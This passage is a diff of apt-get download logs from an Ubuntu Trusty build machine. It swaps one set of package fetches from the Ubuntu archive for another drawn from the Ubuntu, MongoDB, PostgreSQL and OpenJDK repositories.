-Get:216 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 rsync amd64 3.1.0-2ubuntu0.4 [284 kB]
-Get:217 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 wget amd64 1.15-1ubuntu1.14.04.4 [270 kB]
-Get:218 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ant-optional all 1.9.3-2ubuntu0.1 [301 kB]
-Get:219 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ant all 1.9.3-2ubuntu0.1 [1868 kB]
-Get:220 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-pc amd64 2.02~beta2-9ubuntu1.16 [174 kB]
-Get:221 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-pc-bin amd64 2.02~beta2-9ubuntu1.16 [882 kB]
-Get:222 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub2-common amd64 2.02~beta2-9ubuntu1.16 [501 kB]
-Get:223 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-common amd64 2.02~beta2-9ubuntu1.16 [1684 kB]
-Get:224 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-problem-report all 2.14.1-0ubuntu3.29 [9504 B]
-Get:225 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-apport all 2.14.1-0ubuntu3.29 [75.5 kB]
-Get:226 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 apport all 2.14.1-0ubuntu3.29 [183 kB]
-Get:227 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 btrfs-tools amd64 3.12-1ubuntu0.2 [332 kB]
-Get:228 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dpkg-dev all 1.17.5ubuntu5.8 [726 kB]
-Get:229 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libdpkg-perl all 1.17.5ubuntu5.8 [179 kB]
-Get:230 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 patch amd64 2.7.1-4ubuntu2.4 [86.9 kB]
-Get:231 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-percept amd64 1:16.b.3-dfsg-1ubuntu2.2 [136 kB]
-Get:232 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-diameter amd64 1:16.b.3-dfsg-1ubuntu2.2 [600 kB]
-Get:233 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-os-mon amd64 1:16.b.3-dfsg-1ubuntu2.2 [94.9 kB]
-Get:234 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-snmp amd64 1:16.b.3-dfsg-1ubuntu2.2 [1496 kB]
-Get:235 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [503 kB]
-Get:236 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-webtool amd64 1:16.b.3-dfsg-1ubuntu2.2 [39.5 kB]
-Get:237 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-erl-docgen amd64 1:16.b.3-dfsg-1ubuntu2.2 [134 kB]
-Get:238 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-edoc amd64 1:16.b.3-dfsg-1ubuntu2.2 [299 kB]
-Get:239 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-corba amd64 1:16.b.3-dfsg-1ubuntu2.2 [2236 kB]
-Get:240 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-inets amd64 1:16.b.3-dfsg-1ubuntu2.2 [755 kB]
-Get:241 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-runtime-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [157 kB]
-Get:242 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-xmerl amd64 1:16.b.3-dfsg-1ubuntu2.2 [973 kB]
-Get:243 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-syntax-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [289 kB]
-Get:244 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-mnesia amd64 1:16.b.3-dfsg-1ubuntu2.2 [658 kB]
-Get:245 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ssh amd64 1:16.b.3-dfsg-1ubuntu2.2 [361 kB]
-Get:246 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-eldap amd64 1:16.b.3-dfsg-1ubuntu2.2 [91.7 kB]
-Get:247 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ssl amd64 1:16.b.3-dfsg-1ubuntu2.2 [559 kB]
-Get:248 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-public-key amd64 1:16.b.3-dfsg-1ubuntu2.2 [497 kB]
-Get:249 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-crypto amd64 1:16.b.3-dfsg-1ubuntu2.2 [70.3 kB]
-Get:250 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ic amd64 1:16.b.3-dfsg-1ubuntu2.2 [818 kB]
-Get:251 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-eunit amd64 1:16.b.3-dfsg-1ubuntu2.2 [137 kB]
-Get:252 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-parsetools amd64 1:16.b.3-dfsg-1ubuntu2.2 [156 kB]
-Get:253 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-odbc amd64 1:16.b.3-dfsg-1ubuntu2.2 [50.2 kB]
-Get:254 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-asn1 amd64 1:16.b.3-dfsg-1ubuntu2.2 [738 kB]
-Get:255 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-base amd64 1:16.b.3-dfsg-1ubuntu2.2 [6519 kB]
-Get:256 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-nox all 1:16.b.3-dfsg-1ubuntu2.2 [17.9 kB]
-Get:257 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gettext amd64 0.18.3.1-1ubuntu3.1 [829 kB]
-Get:258 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 imagemagick amd64 8:6.7.7.10-6ubuntu3.13 [189 kB]
-Get:259 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-bin amd64 13.2.0-1ubuntu1.2 [11.9 kB]
-Get:260 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-core all 13.2.0-1ubuntu1.2 [983 kB]
-Get:261 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-web all 13.2.0-1ubuntu1.2 [291 kB]
-Get:262 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-apt amd64 0.9.3.5ubuntu3 [141 kB]
-Get:263 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 landscape-client amd64 14.12-0ubuntu6.14.04.4 [18.6 kB]
-Get:264 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 landscape-common amd64 14.12-0ubuntu6.14.04.4 [170 kB]
-Get:265 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libruby1.9.1 amd64 1.9.3.484-2ubuntu1.13 [2649 kB]
-Get:266 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ruby1.9.1 amd64 1.9.3.484-2ubuntu1.13 [35.6 kB]
-Get:267 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 memcached amd64 1.4.14-0ubuntu9.3 [67.3 kB]
-Get:268 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 policykit-1 amd64 0.105-4ubuntu3.14.04.5 [51.9 kB]
-Get:269 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-six all 1.5.2-1ubuntu1.1 [8348 B]
-Get:270 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-urllib3 all 1.7.1-1ubuntu4.1 [39.4 kB]
-Get:271 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-requests all 2.2.1-1ubuntu0.4 [43.5 kB]
-Get:272 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-names all 13.2.0-1ubuntu1.2 [78.5 kB]
-Get:273 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 w3m amd64 0.5.3-15ubuntu0.2 [876 kB]
-Get:274 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 xfsprogs amd64 3.1.9ubuntu2.1 [507 kB]
-Get:275 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 cloud-init all 0.7.5-0ubuntu1.23 [200 kB]
-Get:276 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libruby2.0 amd64 2.0.0.484-1ubuntu2.11 [2805 kB]
-Get:277 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ruby2.0 amd64 2.0.0.484-1ubuntu2.11 [66.5 kB]
-Get:278 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 open-vm-tools amd64 2:9.4.0-1280544-5ubuntu6.4 [451 kB]
+Get:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dpkg amd64 1.17.5ubuntu5.8 [1958 kB]
+Get:2 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-shell amd64 3.4.19 [8078 kB]
+Get:3 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jdk amd64 8u171-b11-2~14.04 [502 kB]
+Get:4 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 libpq-dev amd64 11.2-1.pgdg14.04+1 [160 kB]
+Get:5 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl amd64 5.18.2-2ubuntu1.7 [2650 kB]
+Get:6 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl-base amd64 5.18.2-2ubuntu1.7 [1150 kB]
+Get:7 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl-modules all 5.18.2-2ubuntu1.7 [2674 kB]
+Get:8 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-server amd64 3.4.19 [14.5 MB]
+Get:9 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc6-dev amd64 2.19-0ubuntu6.14 [1913 kB]
+Get:10 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc-dev-bin amd64 2.19-0ubuntu6.14 [69.0 kB]
+Get:11 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 linux-libc-dev amd64 3.13.0-165.215 [773 kB]
+Get:12 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc-bin amd64 2.19-0ubuntu6.14 [1166 kB]
+Get:13 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc6 amd64 2.19-0ubuntu6.14 [4753 kB]
+Get:14 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 libpq5 amd64 11.2-1.pgdg14.04+1 [164 kB]
+Get:15 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 zlib1g-dev amd64 1:1.2.8.dfsg-1ubuntu1.1 [166 kB]
+Get:16 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 zlib1g amd64 1:1.2.8.dfsg-1ubuntu1.1 [49.8 kB]
+Get:17 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-mongos amd64 3.4.19 [8379 kB]
+Get:18 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpng12-dev amd64 1.2.50-1ubuntu2.14.04.3 [206 kB]
+Get:19 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 pgdg-keyring all 2018.2 [10.7 kB]
+Get:20 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpng12-0 amd64 1.2.50-1ubuntu2.14.04.3 [118 kB]
+Get:21 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcrypt11-dev amd64 1.5.3-2ubuntu4.6 [273 kB]
+Get:22 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcrypt11 amd64 1.5.3-2ubuntu4.6 [238 kB]
+Get:23 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libatomic1 amd64 4.8.4-2ubuntu1~14.04.4 [8630 B]
+Get:24 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.3 amd64 9.3.25-1.pgdg14.04+1 [418 kB]
+Get:25 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libitm1 amd64 4.8.4-2ubuntu1~14.04.4 [28.6 kB]
+Get:26 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgomp1 amd64 4.8.4-2ubuntu1~14.04.4 [23.1 kB]
+Get:27 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libasan0 amd64 4.8.4-2ubuntu1~14.04.4 [63.1 kB]
+Get:28 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtsan0 amd64 4.8.4-2ubuntu1~14.04.4 [94.8 kB]
+Get:29 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libquadmath0 amd64 4.8.4-2ubuntu1~14.04.4 [126 kB]
+Get:30 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 g++-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [18.0 MB]
+Get:31 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-common all 199.pgdg14.04+1 [224 kB]
+Get:32 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-common all 199.pgdg14.04+1 [83.6 kB]
+Get:33 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gcc-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [5040 kB]
+Get:34 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.3 amd64 9.3.25-1.pgdg14.04+1 [1061 kB]
+Get:35 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 cpp-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [4452 kB]
+Get:36 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-tools amd64 3.4.19 [40.4 MB]
+Get:37 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libstdc++-4.8-dev amd64 4.8.4-2ubuntu1~14.04.4 [1051 kB]
+Get:38 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.3 amd64 9.3.25-1.pgdg14.04+1 [3515 kB]
+Get:39 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcc-4.8-dev amd64 4.8.4-2ubuntu1~14.04.4 [1688 kB]
+Get:40 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gcc-4.8-base amd64 4.8.4-2ubuntu1~14.04.4 [16.7 kB]
+Get:41 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libstdc++6 amd64 4.8.4-2ubuntu1~14.04.4 [260 kB]
+Get:42 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jdk-headless amd64 8u171-b11-2~14.04 [8188 kB]
+Get:43 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtasn1-6-dev amd64 3.4-3ubuntu0.6 [385 kB]
+Get:44 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtasn1-6 amd64 3.4-3ubuntu0.6 [43.6 kB]
+Get:45 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libk5crypto3 amd64 1.12+dfsg-2ubuntu5.4 [79.4 kB]
+Get:46 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgssrpc4 amd64 1.12+dfsg-2ubuntu5.4 [53.1 kB]
+Get:47 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkadm5srv-mit9 amd64 1.12+dfsg-2ubuntu5.4 [50.3 kB]
+Get:48 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkadm5clnt-mit9 amd64 1.12+dfsg-2ubuntu5.4 [36.2 kB]
+Get:49 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5-dev amd64 1.12+dfsg-2ubuntu5.4 [14.4 kB]
+Get:50 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 krb5-multidev amd64 1.12+dfsg-2ubuntu5.4 [111 kB]
+Get:51 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5support0 amd64 1.12+dfsg-2ubuntu5.4 [31.1 kB]
+Get:52 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5-3 amd64 1.12+dfsg-2ubuntu5.4 [262 kB]
+Get:53 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgssapi-krb5-2 amd64 1.12+dfsg-2ubuntu5.4 [114 kB]
+Get:54 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkdb5-7 amd64 1.12+dfsg-2ubuntu5.4 [36.2 kB]
+Get:55 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libldap2-dev amd64 2.4.31-1+nmu2ubuntu8.5 [259 kB]
+Get:56 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libldap-2.4-2 amd64 2.4.31-1+nmu2ubuntu8.5 [153 kB]
+Get:57 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl4-gnutls-dev amd64 7.35.0-1ubuntu2.20 [237 kB]
+Get:58 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.4 amd64 9.4.21-1.pgdg14.04+1 [453 kB]
+Get:59 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl3-gnutls amd64 7.35.0-1ubuntu2.20 [166 kB]
+Get:60 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-dev amd64 2.40.2-0ubuntu1.1 [1325 kB]
+Get:61 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-data all 2.40.2-0ubuntu1.1 [116 kB]
+Get:62 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-bin amd64 2.40.2-0ubuntu1.1 [34.9 kB]
+Get:63 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.4 amd64 9.4.21-1.pgdg14.04+1 [1102 kB]
+Get:64 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-0 amd64 2.40.2-0ubuntu1.1 [1059 kB]
+Get:65 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-data all 2:1.6.2-1ubuntu2.1 [111 kB]
+Get:66 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-dev amd64 2:1.6.2-1ubuntu2.1 [632 kB]
+Get:67 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-6 amd64 2:1.6.2-1ubuntu2.1 [561 kB]
+Get:68 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxml2-dev amd64 2.9.1+dfsg1-3ubuntu4.13 [630 kB]
+Get:69 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.4 amd64 9.4.21-1.pgdg14.04+1 [3724 kB]
+Get:70 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxml2 amd64 2.9.1+dfsg1-3ubuntu4.13 [573 kB]
+Get:71 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-common-data amd64 0.6.31-4ubuntu1.3 [21.1 kB]
+Get:72 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-common3 amd64 0.6.31-4ubuntu1.3 [21.7 kB]
+Get:73 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-client3 amd64 0.6.31-4ubuntu1.3 [25.2 kB]
+Get:74 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcups2 amd64 1.7.2-0ubuntu1.11 [178 kB]
+Get:75 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gir1.2-gdkpixbuf-2.0 amd64 2.30.7-0ubuntu1.8 [7950 B]
+Get:76 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-dev amd64 2.30.7-0ubuntu1.8 [43.0 kB]
+Get:77 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-common all 2.30.7-0ubuntu1.8 [9338 B]
+Get:78 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-0 amd64 2.30.7-0ubuntu1.8 [161 kB]
+Get:79 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjasper-dev amd64 1.900.1-14ubuntu3.5 [520 kB]
+Get:80 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjasper1 amd64 1.900.1-14ubuntu3.5 [131 kB]
+Get:81 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org amd64 3.4.19 [3514 B]
+Get:82 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiff5-dev amd64 4.0.3-7ubuntu0.10 [266 kB]
+Get:83 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiffxx5 amd64 4.0.3-7ubuntu0.10 [5626 B]
+Get:84 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjpeg-turbo8-dev amd64 1.3.0-0ubuntu2.1 [242 kB]
+Get:85 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.5 amd64 9.5.16-1.pgdg14.04+1 [459 kB]
+Get:86 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjpeg-turbo8 amd64 1.3.0-0ubuntu2.1 [104 kB]
+Get:87 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiff5 amd64 4.0.3-7ubuntu0.10 [147 kB]
+Get:88 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpixman-1-dev amd64 0.30.2-2ubuntu1.2 [240 kB]
+Get:89 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpixman-1-0 amd64 0.30.2-2ubuntu1.2 [226 kB]
+Get:90 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.5 amd64 9.5.16-1.pgdg14.04+1 [1200 kB]
+Get:91 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxcursor1 amd64 1:1.1.14-1ubuntu0.14.04.2 [19.8 kB]
+Get:92 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkmod2 amd64 15-0ubuntu7 [38.1 kB]
+Get:93 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libprocps3 amd64 1:3.3.9-1ubuntu2.3 [31.7 kB]
+Get:94 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 procps amd64 1:3.3.9-1ubuntu2.3 [210 kB]
+Get:95 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 udev amd64 204-5ubuntu20.29 [736 kB]
+Get:96 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libudev1 amd64 204-5ubuntu20.29 [34.3 kB]
+Get:97 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 initramfs-tools all 0.103ubuntu4.11 [44.6 kB]
+Get:98 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.5 amd64 9.5.16-1.pgdg14.04+1 [3940 kB]
+Get:99 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 initramfs-tools-bin amd64 0.103ubuntu4.11 [8610 B]
+Get:100 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 kmod amd64 15-0ubuntu7 [84.9 kB]
+Get:101 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 module-init-tools all 15-0ubuntu7 [1944 B]
+Get:102 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 plymouth amd64 0.8.8-0ubuntu17.2 [98.4 kB]
+Get:103 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libplymouth2 amd64 0.8.8-0ubuntu17.2 [76.6 kB]
+Get:104 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 mountall amd64 2.53ubuntu1 [55.6 kB]
+Get:105 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapt-pkg4.12 amd64 1.0.1ubuntu2.19 [638 kB]
+Get:106 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapt-inst1.5 amd64 1.0.1ubuntu2.19 [58.4 kB]
+Get:107 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 file amd64 1:5.14-2ubuntu3.4 [19.4 kB]
+Get:108 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagic1 amd64 1:5.14-2ubuntu3.4 [185 kB]
+Get:109 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4-dev amd64 3.4.3-1ubuntu1~14.04.7 [421 kB]
+Get:110 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-dev amd64 3.4.3-1ubuntu1~14.04.7 [17.8 MB]
+Get:111 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.6 amd64 9.6.12-1.pgdg14.04+1 [503 kB]
+Get:112 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.6 amd64 9.6.12-1.pgdg14.04+1 [1287 kB]
+Get:113 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4 amd64 3.4.3-1ubuntu1~14.04.7 [1303 kB]
+Get:114 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4 amd64 3.4.3-1ubuntu1~14.04.7 [178 kB]
+Get:115 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-stdlib amd64 3.4.3-1ubuntu1~14.04.7 [1986 kB]
+Get:116 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4-minimal amd64 3.4.3-1ubuntu1~14.04.7 [1224 kB]
+Get:117 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libssl-dev amd64 1.0.1f-1ubuntu2.27 [1076 kB]
+Get:118 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libssl1.0.0 amd64 1.0.1f-1ubuntu2.27 [831 kB]
+Get:119 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-minimal amd64 3.4.3-1ubuntu1~14.04.7 [461 kB]
